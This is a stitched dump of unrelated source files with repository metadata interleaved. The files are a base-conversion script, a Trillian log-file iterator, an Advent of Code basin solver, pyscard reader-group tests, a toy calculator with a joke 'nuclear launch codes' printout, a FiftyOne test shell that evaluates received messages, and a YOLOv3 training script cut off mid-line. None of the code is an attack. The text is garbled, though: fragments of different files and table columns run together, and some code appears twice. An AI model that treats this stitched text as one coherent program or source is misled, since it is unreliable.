            count += base ** i * int(digit)
        print(count)
# Ad-hoc demo.  print is now invoked in call form (valid on both Python 2
# and 3) and guarded so importing this module produces no output.
if __name__ == "__main__":
    a = Solution()
    print(a.changebase(44, 4))
    print(a.countNum(44, 4))
    print(a.changebase(23, 4))
| 21.3
| 46
| 0.544601
|
class Solution(object):
def changebase(self, n, base):
digits = "0123456789ABCDEF"
remstack = []
while n > 0:
rem = n % base
remstack.append(rem)
n = n / base
newString = ""
while not len(remstack) == 0:
newString += digits[remstack.pop()]
return newString
def countNum(self, n, base):
res = self.changebase(n, base)[:-1][::-1]
i = 0
count = 0
while i < len(res):
print int(res[i])
count += base**i * int(res[i])
i += 1
print count
a = Solution()
print a.changebase(44, 4)
print a.countNum(44, 4)
print a.changebase(23, 4)
| false
| true
|
790c7da827e14ff727534ea42036678e1841c3da
| 377
|
py
|
Python
|
chat_unifier/file_iterators/trillian_xml.py
|
mtlynch/chat_unifier
|
7449ca4f2dd48d8b76fc29e150643076dd0b3334
|
[
"MIT"
] | 2
|
2018-10-16T18:39:06.000Z
|
2019-01-22T01:38:09.000Z
|
chat_unifier/file_iterators/trillian_xml.py
|
mtlynch/chat_unifier
|
7449ca4f2dd48d8b76fc29e150643076dd0b3334
|
[
"MIT"
] | 2
|
2018-10-19T00:00:21.000Z
|
2018-10-19T17:15:25.000Z
|
chat_unifier/file_iterators/trillian_xml.py
|
mtlynch/chat_unifier
|
7449ca4f2dd48d8b76fc29e150643076dd0b3334
|
[
"MIT"
] | null | null | null |
import os
def iterate_files(directory):
    """Yield the path of every Trillian XML log file under *directory*.

    The tree is walked recursively; candidate names are filtered through
    ``_is_log_file``.
    """
    for dirpath, _subdirs, names in os.walk(directory):
        for name in names:
            if not _is_log_file(name):
                continue
            yield os.path.join(dirpath, name)
def _is_log_file(filename):
basename, extension = os.path.splitext(filename)
return ((extension == '.xml') and (not basename.endswith('-assets')))
| 26.928571
| 73
| 0.660477
|
import os
def iterate_files(directory):
for root, dirs, filenames in os.walk(directory):
for filename in filenames:
if _is_log_file(filename):
yield os.path.join(root, filename)
def _is_log_file(filename):
basename, extension = os.path.splitext(filename)
return ((extension == '.xml') and (not basename.endswith('-assets')))
| true
| true
|
790c7dc745912cc64eded0455518ab84c72d7f34
| 1,261
|
py
|
Python
|
2021/09-2.py
|
lsangers/AdventOfCode
|
5e4d1bb71c80609ef1472e5167922ed378ab06d6
|
[
"MIT"
] | 1
|
2021-12-03T10:35:45.000Z
|
2021-12-03T10:35:45.000Z
|
2021/09-2.py
|
lsangers/AdventOfCode
|
5e4d1bb71c80609ef1472e5167922ed378ab06d6
|
[
"MIT"
] | null | null | null |
2021/09-2.py
|
lsangers/AdventOfCode
|
5e4d1bb71c80609ef1472e5167922ed378ab06d6
|
[
"MIT"
] | null | null | null |
import os
import sys
# NOTE(review): os and sys are imported but unused below.
filename = __file__[:-5] + '-input'  # strips "-2.py" -> shared "<day>-input" file
with open(filename) as f:
    # Height map: one list of single-digit ints per input line.
    board = list(map(lambda s: list(map(int, list(s))), f.read().splitlines()))
max_row = len(board)
max_col = len(board[0])
def get_neighbors(row, col):
    """Return the orthogonal neighbours of (row, col) that lie on the
    ``max_row`` x ``max_col`` board (module-level globals)."""
    result = []
    if row > 0:
        result.append((row - 1, col))
    if row + 1 < max_row:
        result.append((row + 1, col))
    if col > 0:
        result.append((row, col - 1))
    if col + 1 < max_col:
        result.append((row, col + 1))
    return result
low_points = []
basin_size = {}
# A low point is strictly lower than every orthogonal neighbour.
for i, row in enumerate(board):
    for j, val in enumerate(row):
        neighbors = [board[r][c] for r,c in get_neighbors(i,j)]
        if all([val < elem for elem in neighbors ]):
            low_points.append((i,j))
# Flood-fill (BFS) outward from each low point; height-9 cells bound basins.
for r,c in low_points:
    visited = []
    to_explore = [(r,c)]
    while len(to_explore) > 0:
        visited.append(to_explore[0])
        cur_r, cur_c = to_explore.pop(0)
        to_explore.extend([(r,c) for r,c in get_neighbors(cur_r, cur_c) if board[r][c] < 9 and (r,c) not in visited and (r,c) not in to_explore])
    basin_size[(r,c)] = len(visited)
# Puzzle answer: product of the three largest basin sizes.
largest_basins = sorted(basin_size, key=basin_size.get, reverse=True)[:3]
print(basin_size[largest_basins[0]]*basin_size[largest_basins[1]]*basin_size[largest_basins[2]])
| 24.72549
| 145
| 0.610626
|
import os
import sys
filename = __file__[:-5] + '-input'
with open(filename) as f:
board = list(map(lambda s: list(map(int, list(s))), f.read().splitlines()))
max_row = len(board)
max_col = len(board[0])
def get_neighbors(row, col):
n = []
if(row > 0):
n.append((row-1,col))
if(row+1 < max_row):
n.append((row+1,col))
if(col > 0):
n.append((row,col-1))
if(col+1 < max_col):
n.append((row,col+1))
return n
low_points = []
basin_size = {}
for i, row in enumerate(board):
for j, val in enumerate(row):
neighbors = [board[r][c] for r,c in get_neighbors(i,j)]
if all([val < elem for elem in neighbors ]):
low_points.append((i,j))
for r,c in low_points:
visited = []
to_explore = [(r,c)]
while len(to_explore) > 0:
visited.append(to_explore[0])
cur_r, cur_c = to_explore.pop(0)
to_explore.extend([(r,c) for r,c in get_neighbors(cur_r, cur_c) if board[r][c] < 9 and (r,c) not in visited and (r,c) not in to_explore])
basin_size[(r,c)] = len(visited)
largest_basins = sorted(basin_size, key=basin_size.get, reverse=True)[:3]
print(basin_size[largest_basins[0]]*basin_size[largest_basins[1]]*basin_size[largest_basins[2]])
| true
| true
|
790c7e2d9fdf394a11fec5da3617ad43ec97070e
| 5,702
|
py
|
Python
|
cacreader/pyscard-2.0.2/smartcard/test/framework/testcase_readergroups.py
|
kyletanyag/LL-Smartcard
|
02abea9de5a13f8bae4d7832ab34cb7f0d9514c9
|
[
"BSD-3-Clause"
] | null | null | null |
cacreader/pyscard-2.0.2/smartcard/test/framework/testcase_readergroups.py
|
kyletanyag/LL-Smartcard
|
02abea9de5a13f8bae4d7832ab34cb7f0d9514c9
|
[
"BSD-3-Clause"
] | null | null | null |
cacreader/pyscard-2.0.2/smartcard/test/framework/testcase_readergroups.py
|
kyletanyag/LL-Smartcard
|
02abea9de5a13f8bae4d7832ab34cb7f0d9514c9
|
[
"BSD-3-Clause"
] | null | null | null |
#! /usr/bin/env python3
"""Unit tests for smartcard.readers.ReaderGroups
This test case can be executed individually, or with all other test cases
thru testsuite_framework.py.
__author__ = "http://www.gemalto.com"
Copyright 2001-2012 gemalto
Author: Jean-Daniel Aussel, mailto:jean-daniel.aussel@gemalto.com
This file is part of pyscard.
pyscard is free software; you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation; either version 2.1 of the License, or
(at your option) any later version.
pyscard is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with pyscard; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import platform
import unittest
from smartcard.System import readergroups
from smartcard.scard import resourceManager
# Reader groups are only supported by the winscard resource manager, and
# these tests are known not to work on Windows 7, hence the guard.
if 'winscard' == resourceManager and \
    -1 == platform.platform().find('Windows-7'):
    class testcase_readergroups(unittest.TestCase):
        """Test smartcard framework readersgroups."""
        pinpadgroup = 'Pinpad$Readers'
        biogroup = 'Biometric$Readers'
        def testcase_readergroup_add(self):
            """tests groups=groups+[newgroups]"""
            # take a snapshot of current groups
            groupssnapshot = list(readergroups())
            groups = readergroups()
            # add pinpad group
            groups = groups + [self.pinpadgroup]
            self.assertEqual(groups, groupssnapshot + [self.pinpadgroup])
            # add pinpad a second time and biometric once; duplicates must
            # not be re-added
            groups = groups + [self.biogroup, self.pinpadgroup]
            self.assertEqual(
                groups, groupssnapshot + [self.pinpadgroup, self.biogroup])
            # clean-up
            groups.remove(self.biogroup)
            groups.remove(self.pinpadgroup)
        def testcase_readergroup_iadd(self):
            """test groups+=[newgroups]"""
            # take a snapshot of current groups
            groupssnapshot = list(readergroups())
            groups = readergroups()
            # add pinpad group
            groups += [self.pinpadgroup]
            self.assertEqual(groups, groupssnapshot + [self.pinpadgroup])
            # add pinpad a second time and biometric once
            groups += [self.biogroup, self.pinpadgroup]
            self.assertEqual(
                groups, groupssnapshot + [self.pinpadgroup, self.biogroup])
            # clean-up
            groups.remove(self.biogroup)
            groups.remove(self.pinpadgroup)
        def testcase_readergroup_radd(self):
            """test groups=[newgroups]+groups"""
            # take a snapshot of current groups
            groupssnapshot = list(readergroups())
            groups = readergroups()
            # add pinpad group; right-add returns a plain list and must not
            # mutate the readergroups object
            zgroups = [self.pinpadgroup] + groups
            self.assertEqual(groups, groupssnapshot)
            self.assertEqual(zgroups, groupssnapshot + [self.pinpadgroup])
            self.assertTrue(isinstance(zgroups, type([])))
            self.assertTrue(isinstance(groups, type(readergroups())))
            # add pinpad twice and biometric once
            zgroups = \
                [self.pinpadgroup, self.biogroup, self.pinpadgroup] + groups
            self.assertEqual(groups, groupssnapshot)
            self.assertEqual(
                zgroups, groupssnapshot + [self.pinpadgroup, self.biogroup])
            self.assertTrue(isinstance(zgroups, type([])))
            self.assertTrue(isinstance(groups, type(readergroups())))
        def testcase_readergroup_append(self):
            """test groups.append(newgroups)"""
            # take a snapshot of current groups
            groupssnapshot = list(readergroups())
            groups = readergroups()
            # add pinpad group
            groups.append(self.pinpadgroup)
            self.assertEqual(groups, groupssnapshot + [self.pinpadgroup])
            # add pinpad a second time; duplicate must be ignored
            groups.append(self.pinpadgroup)
            self.assertEqual(groups, groupssnapshot + [self.pinpadgroup])
            # add biometric once
            groups.append(self.biogroup)
            self.assertEqual(
                groups, groupssnapshot + [self.pinpadgroup, self.biogroup])
            # clean-up
            groups.remove(self.biogroup)
            groups.remove(self.pinpadgroup)
        def testcase_readergroup_insert(self):
            """test groups.insert(i,newgroups)"""
            # take a snapshot of current groups
            groupssnapshot = list(readergroups())
            groups = readergroups()
            # add pinpad group
            groups.insert(0, self.pinpadgroup)
            self.assertEqual(groups, groupssnapshot + [self.pinpadgroup])
            # add pinpad a second time; duplicate must be ignored
            groups.insert(1, self.pinpadgroup)
            self.assertEqual(groups, groupssnapshot + [self.pinpadgroup])
            # add biometric once
            groups.insert(1, self.biogroup)
            self.assertEqual(
                groups, groupssnapshot + [self.pinpadgroup, self.biogroup])
            # clean-up
            groups.remove(self.biogroup)
            groups.remove(self.pinpadgroup)
def suite():
    """Return a TestSuite containing the reader-group tests.

    ``unittest.makeSuite`` was deprecated in Python 3.11 and removed in
    3.13, so build the suite through the default TestLoader instead.
    """
    suite1 = unittest.defaultTestLoader.loadTestsFromTestCase(testcase_readergroups)
    # The original passed (suite1) -- not a tuple; make the intent explicit.
    return unittest.TestSuite((suite1,))
if __name__ == '__main__':
    # Discover and run the tests when this module is executed directly.
    unittest.main()
| 35.197531
| 76
| 0.632936
|
import platform
import unittest
from smartcard.System import readergroups
from smartcard.scard import resourceManager
if 'winscard' == resourceManager and \
-1 == platform.platform().find('Windows-7'):
class testcase_readergroups(unittest.TestCase):
pinpadgroup = 'Pinpad$Readers'
biogroup = 'Biometric$Readers'
def testcase_readergroup_add(self):
groupssnapshot = list(readergroups())
groups = readergroups()
groups = groups + [self.pinpadgroup]
self.assertEqual(groups, groupssnapshot + [self.pinpadgroup])
groups = groups + [self.biogroup, self.pinpadgroup]
self.assertEqual(
groups, groupssnapshot + [self.pinpadgroup, self.biogroup])
groups.remove(self.biogroup)
groups.remove(self.pinpadgroup)
def testcase_readergroup_iadd(self):
groupssnapshot = list(readergroups())
groups = readergroups()
groups += [self.pinpadgroup]
self.assertEqual(groups, groupssnapshot + [self.pinpadgroup])
groups += [self.biogroup, self.pinpadgroup]
self.assertEqual(
groups, groupssnapshot + [self.pinpadgroup, self.biogroup])
groups.remove(self.biogroup)
groups.remove(self.pinpadgroup)
def testcase_readergroup_radd(self):
groupssnapshot = list(readergroups())
groups = readergroups()
zgroups = [self.pinpadgroup] + groups
self.assertEqual(groups, groupssnapshot)
self.assertEqual(zgroups, groupssnapshot + [self.pinpadgroup])
self.assertTrue(isinstance(zgroups, type([])))
self.assertTrue(isinstance(groups, type(readergroups())))
zgroups = \
[self.pinpadgroup, self.biogroup, self.pinpadgroup] + groups
self.assertEqual(groups, groupssnapshot)
self.assertEqual(
zgroups, groupssnapshot + [self.pinpadgroup, self.biogroup])
self.assertTrue(isinstance(zgroups, type([])))
self.assertTrue(isinstance(groups, type(readergroups())))
def testcase_readergroup_append(self):
groupssnapshot = list(readergroups())
groups = readergroups()
groups.append(self.pinpadgroup)
self.assertEqual(groups, groupssnapshot + [self.pinpadgroup])
groups.append(self.pinpadgroup)
self.assertEqual(groups, groupssnapshot + [self.pinpadgroup])
groups.append(self.biogroup)
self.assertEqual(
groups, groupssnapshot + [self.pinpadgroup, self.biogroup])
groups.remove(self.biogroup)
groups.remove(self.pinpadgroup)
def testcase_readergroup_insert(self):
groupssnapshot = list(readergroups())
groups = readergroups()
groups.insert(0, self.pinpadgroup)
self.assertEqual(groups, groupssnapshot + [self.pinpadgroup])
groups.insert(1, self.pinpadgroup)
self.assertEqual(groups, groupssnapshot + [self.pinpadgroup])
groups.insert(1, self.biogroup)
self.assertEqual(
groups, groupssnapshot + [self.pinpadgroup, self.biogroup])
groups.remove(self.biogroup)
groups.remove(self.pinpadgroup)
def suite():
suite1 = unittest.makeSuite(testcase_readergroups)
return unittest.TestSuite((suite1))
if __name__ == '__main__':
unittest.main()
| true
| true
|
790c7eff2b6847934590088a080fd9be468a144e
| 3,147
|
py
|
Python
|
Nivek maths/nivek-maths.py
|
ThiccTT/nivek-maths
|
37f222b3ddc72455313eb619a79bc6045b89b506
|
[
"MIT"
] | null | null | null |
Nivek maths/nivek-maths.py
|
ThiccTT/nivek-maths
|
37f222b3ddc72455313eb619a79bc6045b89b506
|
[
"MIT"
] | null | null | null |
Nivek maths/nivek-maths.py
|
ThiccTT/nivek-maths
|
37f222b3ddc72455313eb619a79bc6045b89b506
|
[
"MIT"
] | null | null | null |
import kanu
# Interactive menu-driven calculator.  Loops forever; exit with Ctrl-C.
# NOTE(review): ``kanu`` is a third-party equation-solving package.
while True:
    print('\n Select one:')
    print('\t1 -> Solve a linear equation')
    print('\t2 -> Simplify any expression')
    print('\t3 -> Is this number a Perfect Square?')
    print('\t4 -> Get Prime Numbers')
    print('\t5 -> START A NUCLEAR WAR :)')
    print('\t6 -> Factor Integers')
    choice = input()
    if choice == '1':
        print('Enter the equation:', end=' ')
        try:
            print(kanu.solve_single_linear_equation(input()))
        except kanu.NonLinearEquationError:
            print('You entered a non-linear equation.')
    elif choice == '2':
        print('Enter the expression:', end=' ')
        print(kanu.all_together_now(input()))
    elif choice == '3':
        import math
        # NOTE(review): float sqrt can misclassify very large perfect
        # squares; math.isqrt would be exact.
        def is_perfect_square(y):
            sqrt_value = math.sqrt(y)
            return int(sqrt_value) ** 2 == y
        number = int(input('Enter a number: '))
        if is_perfect_square(number):
            print("It is a perfect square!")
        else:
            print("It is NOT a perfect square!")
    elif choice == '4':
        # Trial-division prime factorisation: strip factors of 2, then try
        # odd divisors only.
        number = int(input("Input an integer:"))
        factors = []
        while number % 2 == 0:
            factors.append(2)
            number //= 2
        divisor = 3
        while number != 1 and divisor <= number:
            if number % divisor == 0:
                factors.append(divisor)
                number //= divisor
            else:
                divisor += 2
        print("The Prime Factors are: ")
        for i in range(len(factors)):
            print(factors[i], end=',')
    elif choice == '5':
        print('Executing "GETTING THE FOOTBALL" ')
        # The nested test is always true here; the loops below only drive a
        # fake tqdm progress bar.
        if choice == '5':
            from tqdm import tqdm
            x = 1
            for i in tqdm(range(0, 1000000)):
                for x in range(0, 100):
                    x *= 4
            print("DONE")
            print("HERE ARE THE NUCLEAR LAUNCH CODES...")
            print(" 56  58  10  62  11  1  25  29  55  62")
            print(" 5  8  1  9  6  7  4  3  10  20")
            print(" 41  16  18  50  9  51  48  5  37  30")
            print(" 40  3  34  61  59  2  39  46  28  47")
            print(" 38  7  42  26  63  45  17  27  60  21")
            print("Launch Nukes?")
            print("\t1 -> YES")
            print('\t2 -> NO')
            choice = input()
            if choice == '1':
                print('Please Wait...')
                from tqdm import tqdm
                x = 1
                for i in tqdm(range(0, 100000)):
                    for x in range(0, 95):
                        x *= 4
                print('BYE BYE WORLD')
                input('press ENTER to continue')
            elif choice == '2':
                print('Maybe Another Day.')
                input('press ENTER to continue')
    elif choice == '6':
        # List all divisors (not just primes) via sqrt-bounded trial
        # division, collecting each divisor with its cofactor.
        import math
        number = int(input("Enter a number: "))
        factors = []
        for i in range(1, int(math.sqrt(number)) + 1):
            if number % i == 0:
                factors.append(i)
                factor_pair = number // i
                if factor_pair != i:
                    factors.append(factor_pair)
        factors.sort()
        print(factors)
| 27.849558
| 61
| 0.479504
|
import kanu
while True:
print('\n Select one:')
print('\t1 -> Solve a linear equation')
print('\t2 -> Simplify any expression')
print('\t3 -> Is this number a Perfect Square?')
print('\t4 -> Get Prime Numbers')
print('\t5 -> START A NUCLEAR WAR :)')
print('\t6 -> Factor Integers')
choice = input()
if choice == '1':
print('Enter the equation:', end=' ')
try:
print(kanu.solve_single_linear_equation(input()))
except kanu.NonLinearEquationError:
print('You entered a non-linear equation.')
elif choice == '2':
print('Enter the expression:', end=' ')
print(kanu.all_together_now(input()))
elif choice == '3':
import math
def is_perfect_square(y):
sqrt_value = math.sqrt(y)
return int(sqrt_value) ** 2 == y
number = int(input('Enter a number: '))
if is_perfect_square(number):
print("It is a perfect square!")
else:
print("It is NOT a perfect square!")
elif choice == '4':
number = int(input("Input an integer:"))
factors = []
while number % 2 == 0:
factors.append(2)
number //= 2
divisor = 3
while number != 1 and divisor <= number:
if number % divisor == 0:
factors.append(divisor)
number //= divisor
else:
divisor += 2
print("The Prime Factors are: ")
for i in range(len(factors)):
print(factors[i], end=',')
elif choice == '5':
print('Executing "GETTING THE FOOTBALL" ')
if choice == '5':
from tqdm import tqdm
x = 1
for i in tqdm(range(0, 1000000)):
for x in range(0, 100):
x *= 4
print("DONE")
print("HERE ARE THE NUCLEAR LAUNCH CODES...")
print(" 56 58 10 62 11 1 25 29 55 62")
print(" 5 8 1 9 6 7 4 3 10 20")
print(" 41 16 18 50 9 51 48 5 37 30")
print(" 40 3 34 61 59 2 39 46 28 47")
print(" 38 7 42 26 63 45 17 27 60 21")
print("Launch Nukes?")
print("\t1 -> YES")
print('\t2 -> NO')
choice = input()
if choice == '1':
print('Please Wait...')
from tqdm import tqdm
x = 1
for i in tqdm(range(0, 100000)):
for x in range(0, 95):
x *= 4
print('BYE BYE WORLD')
input('press ENTER to continue')
elif choice == '2':
print('Maybe Another Day.')
input('press ENTER to continue')
elif choice == '6':
import math
number = int(input("Enter a number: "))
factors = []
for i in range(1, int(math.sqrt(number)) + 1):
if number % i == 0:
factors.append(i)
factor_pair = number // i
if factor_pair != i:
factors.append(factor_pair)
factors.sort()
print(factors)
| true
| true
|
790c80f4c14bdf6903ead32c4acdbd76b70246ed
| 530
|
py
|
Python
|
tests/utils/interactive_python.py
|
Bukkster/fiftyone
|
c061216de5094131c8ce8718d8a6ac58056b003e
|
[
"Apache-2.0"
] | 3
|
2022-01-18T06:13:33.000Z
|
2022-02-14T13:28:23.000Z
|
tests/utils/interactive_python.py
|
Bukkster/fiftyone
|
c061216de5094131c8ce8718d8a6ac58056b003e
|
[
"Apache-2.0"
] | null | null | null |
tests/utils/interactive_python.py
|
Bukkster/fiftyone
|
c061216de5094131c8ce8718d8a6ac58056b003e
|
[
"Apache-2.0"
] | null | null | null |
"""
A script that simulates a Python shell and accepts arbitrary commands to
execute. For use by service tests.
| Copyright 2017-2022, Voxel51, Inc.
| `voxel51.com <https://voxel51.com/>`_
|
"""
import os
os.environ["FIFTYONE_DISABLE_SERVICES"] = "1"
from fiftyone.service.ipc import IPCServer
env = {}
def handle_message(message):
try:
code = compile(message, "", "eval")
except SyntaxError:
code = compile(message, "", "exec")
return eval(code, env)
IPCServer(handle_message).serve_forever()
| 19.62963
| 72
| 0.688679
|
import os
os.environ["FIFTYONE_DISABLE_SERVICES"] = "1"
from fiftyone.service.ipc import IPCServer
env = {}
def handle_message(message):
try:
code = compile(message, "", "eval")
except SyntaxError:
code = compile(message, "", "exec")
return eval(code, env)
IPCServer(handle_message).serve_forever()
| true
| true
|
790c8212906e2e6267368f455cbefe1625b1c2d4
| 9,512
|
py
|
Python
|
train.py
|
finite-infinity/tensorflow-serving-yolov3
|
d9244b2b12c2c6370638f48109f7a8f2ffeaa4c4
|
[
"MIT"
] | 428
|
2019-10-15T15:30:01.000Z
|
2022-03-30T02:14:44.000Z
|
train.py
|
finite-infinity/tensorflow-serving-yolov3
|
d9244b2b12c2c6370638f48109f7a8f2ffeaa4c4
|
[
"MIT"
] | 115
|
2019-10-24T12:59:26.000Z
|
2022-03-12T00:02:34.000Z
|
train.py
|
finite-infinity/tensorflow-serving-yolov3
|
d9244b2b12c2c6370638f48109f7a8f2ffeaa4c4
|
[
"MIT"
] | 131
|
2019-10-21T06:40:12.000Z
|
2022-03-18T21:26:18.000Z
|
#! /usr/bin/env python
# coding=utf-8
import os
import time
import shutil
import numpy as np
import tensorflow as tf
import core.utils as utils
from tqdm import tqdm
from core.dataset import Dataset
from core.yolov3 import YOLOV3
from core.config import cfg
class YoloTrain(object):
def __init__(self): # 从config文件获取到一些变量
self.anchor_per_scale = cfg.YOLO.ANCHOR_PER_SCALE
self.classes = utils.read_class_names(cfg.YOLO.CLASSES)
self.num_classes = len(self.classes)
self.learn_rate_init = cfg.TRAIN.LEARN_RATE_INIT
self.learn_rate_end = cfg.TRAIN.LEARN_RATE_END
self.first_stage_epochs = cfg.TRAIN.FISRT_STAGE_EPOCHS
self.second_stage_epochs = cfg.TRAIN.SECOND_STAGE_EPOCHS
self.warmup_periods = cfg.TRAIN.WARMUP_EPOCHS
self.initial_weight = cfg.TRAIN.INITIAL_WEIGHT
self.time = time.strftime('%Y-%m-%d-%H-%M-%S', time.localtime(time.time()))
self.moving_ave_decay = cfg.YOLO.MOVING_AVE_DECAY
self.max_bbox_per_scale = 150
self.train_logdir = "./data/log/train" # 日志保存地址
self.trainset = Dataset('train')
self.testset = Dataset('test')
self.steps_per_period = len(self.trainset)
self.sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))
with tf.name_scope('define_input'): # 定义输入层
self.input_data = tf.placeholder(dtype=tf.float32, name='input_data')
self.label_sbbox = tf.placeholder(dtype=tf.float32, name='label_sbbox')
self.label_mbbox = tf.placeholder(dtype=tf.float32, name='label_mbbox')
self.label_lbbox = tf.placeholder(dtype=tf.float32, name='label_lbbox')
self.true_sbboxes = tf.placeholder(dtype=tf.float32, name='sbboxes')
self.true_mbboxes = tf.placeholder(dtype=tf.float32, name='mbboxes')
self.true_lbboxes = tf.placeholder(dtype=tf.float32, name='lbboxes')
self.trainable = tf.placeholder(dtype=tf.bool, name='training')
with tf.name_scope("define_loss"): # 定义损失函数
self.model = YOLOV3(self.input_data, self.trainable)
self.net_var = tf.global_variables()
self.giou_loss, self.conf_loss, self.prob_loss = self.model.compute_loss(
self.label_sbbox, self.label_mbbox, self.label_lbbox,
self.true_sbboxes, self.true_mbboxes, self.true_lbboxes)
self.loss = self.giou_loss + self.conf_loss + self.prob_loss
with tf.name_scope('learn_rate'): # 定义学习率
self.global_step = tf.Variable(1.0, dtype=tf.float64, trainable=False, name='global_step')
warmup_steps = tf.constant(self.warmup_periods * self.steps_per_period,
dtype=tf.float64, name='warmup_steps')
train_steps = tf.constant((self.first_stage_epochs + self.second_stage_epochs) * self.steps_per_period,
dtype=tf.float64, name='train_steps')
self.learn_rate = tf.cond(
pred=self.global_step < warmup_steps,
true_fn=lambda: self.global_step / warmup_steps * self.learn_rate_init,
false_fn=lambda: self.learn_rate_end + 0.5 * (self.learn_rate_init - self.learn_rate_end) *
(1 + tf.cos(
(self.global_step - warmup_steps) / (train_steps - warmup_steps) * np.pi))
)
global_step_update = tf.assign_add(self.global_step, 1.0)
'''
warmup_steps作用:
神经网络在刚开始训练的过程中容易出现loss=NaN的情况,为了尽量避免这个情况,因此初始的学习率设置得很低
但是这又使得训练速度变慢了。因此,采用逐渐增大的学习率,从而达到既可以尽量避免出现nan,又可以等训练过程稳定了再增大训练速度的目的。
'''
with tf.name_scope("define_weight_decay"): # 指数平滑,可以让算法在最后不那么震荡,结果更有鲁棒性
moving_ave = tf.train.ExponentialMovingAverage(self.moving_ave_decay).apply(tf.trainable_variables())
# 指定需要恢复的参数。层等信息, 位置提前,减少模型体积。
with tf.name_scope('loader_and_saver'):
variables_to_restore = [v for v in self.net_var if
v.name.split('/')[0] not in ['conv_sbbox', 'conv_mbbox', 'conv_lbbox']]
self.loader = tf.train.Saver(variables_to_restore)
self.saver = tf.train.Saver(tf.global_variables(), max_to_keep=1)
with tf.name_scope("define_first_stage_train"): # 第一阶段训练,只训练指定层
self.first_stage_trainable_var_list = []
for var in tf.trainable_variables():
var_name = var.op.name
var_name_mess = str(var_name).split('/')
if var_name_mess[0] in ['conv_sbbox', 'conv_mbbox', 'conv_lbbox']:
self.first_stage_trainable_var_list.append(var)
first_stage_optimizer = tf.train.AdamOptimizer(self.learn_rate).minimize(self.loss,
var_list=self.first_stage_trainable_var_list)
with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
with tf.control_dependencies([first_stage_optimizer, global_step_update]):
with tf.control_dependencies([moving_ave]):
self.train_op_with_frozen_variables = tf.no_op()
with tf.name_scope("define_second_stage_train"): # 第二阶段训练,释放所有层
second_stage_trainable_var_list = tf.trainable_variables()
second_stage_optimizer = tf.train.AdamOptimizer(self.learn_rate).minimize(self.loss,
var_list=second_stage_trainable_var_list)
with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
with tf.control_dependencies([second_stage_optimizer, global_step_update]):
with tf.control_dependencies([moving_ave]):
self.train_op_with_all_variables = tf.no_op()
with tf.name_scope('summary'):
tf.summary.scalar("learn_rate", self.learn_rate)
tf.summary.scalar("giou_loss", self.giou_loss)
tf.summary.scalar("conf_loss", self.conf_loss)
tf.summary.scalar("prob_loss", self.prob_loss)
tf.summary.scalar("total_loss", self.loss)
logdir = "./data/log/" # 日志保存地址
if os.path.exists(logdir): shutil.rmtree(logdir)
os.mkdir(logdir)
self.write_op = tf.summary.merge_all()
self.summary_writer = tf.summary.FileWriter(logdir, graph=self.sess.graph)
def train(self):
self.sess.run(tf.global_variables_initializer())
try:
print('=> Restoring weights from: %s ... ' % self.initial_weight)
self.loader.restore(self.sess, self.initial_weight)
except:
print('=> %s does not exist !!!' % self.initial_weight)
print('=> Now it starts to train YOLOV3 from scratch ...')
self.first_stage_epochs = 0
# 阶段学习率
for epoch in range(1, 1 + self.first_stage_epochs + self.second_stage_epochs):
if epoch <= self.first_stage_epochs:
train_op = self.train_op_with_frozen_variables
else:
train_op = self.train_op_with_all_variables
# tqdm is a visualization tool that displays an Iterable object in a progree bar
pbar = tqdm(self.trainset)
train_epoch_loss, test_epoch_loss = [], []
for train_data in pbar:
_, summary, train_step_loss, global_step_val = self.sess.run(
[train_op, self.write_op, self.loss, self.global_step], feed_dict={
self.input_data: train_data[0],
self.label_sbbox: train_data[1],
self.label_mbbox: train_data[2],
self.label_lbbox: train_data[3],
self.true_sbboxes: train_data[4],
self.true_mbboxes: train_data[5],
self.true_lbboxes: train_data[6],
self.trainable: True,
})
train_epoch_loss.append(train_step_loss)
self.summary_writer.add_summary(summary, global_step_val)
pbar.set_description("train loss: %.2f" % train_step_loss)
for test_data in self.testset:
test_step_loss = self.sess.run(self.loss, feed_dict={
self.input_data: test_data[0],
self.label_sbbox: test_data[1],
self.label_mbbox: test_data[2],
self.label_lbbox: test_data[3],
self.true_sbboxes: test_data[4],
self.true_mbboxes: test_data[5],
self.true_lbboxes: test_data[6],
self.trainable: False,
})
test_epoch_loss.append(test_step_loss)
train_epoch_loss, test_epoch_loss = np.mean(train_epoch_loss), np.mean(test_epoch_loss)
ckpt_file = "./checkpoint/yolov3_train_loss=%.4f.ckpt" % train_epoch_loss
log_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
print("=> Epoch: %2d Time: %s Train loss: %.2f Test loss: %.2f Saving %s ..."
% (epoch, log_time, train_epoch_loss, test_epoch_loss, ckpt_file))
self.saver.save(self.sess, ckpt_file, global_step=epoch)
if __name__ == '__main__': YoloTrain().train()
| 51.978142
| 130
| 0.610387
|
import os
import time
import shutil
import numpy as np
import tensorflow as tf
import core.utils as utils
from tqdm import tqdm
from core.dataset import Dataset
from core.yolov3 import YOLOV3
from core.config import cfg
class YoloTrain(object):
def __init__(self):
self.anchor_per_scale = cfg.YOLO.ANCHOR_PER_SCALE
self.classes = utils.read_class_names(cfg.YOLO.CLASSES)
self.num_classes = len(self.classes)
self.learn_rate_init = cfg.TRAIN.LEARN_RATE_INIT
self.learn_rate_end = cfg.TRAIN.LEARN_RATE_END
self.first_stage_epochs = cfg.TRAIN.FISRT_STAGE_EPOCHS
self.second_stage_epochs = cfg.TRAIN.SECOND_STAGE_EPOCHS
self.warmup_periods = cfg.TRAIN.WARMUP_EPOCHS
self.initial_weight = cfg.TRAIN.INITIAL_WEIGHT
self.time = time.strftime('%Y-%m-%d-%H-%M-%S', time.localtime(time.time()))
self.moving_ave_decay = cfg.YOLO.MOVING_AVE_DECAY
self.max_bbox_per_scale = 150
self.train_logdir = "./data/log/train"
self.trainset = Dataset('train')
self.testset = Dataset('test')
self.steps_per_period = len(self.trainset)
self.sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))
with tf.name_scope('define_input'):
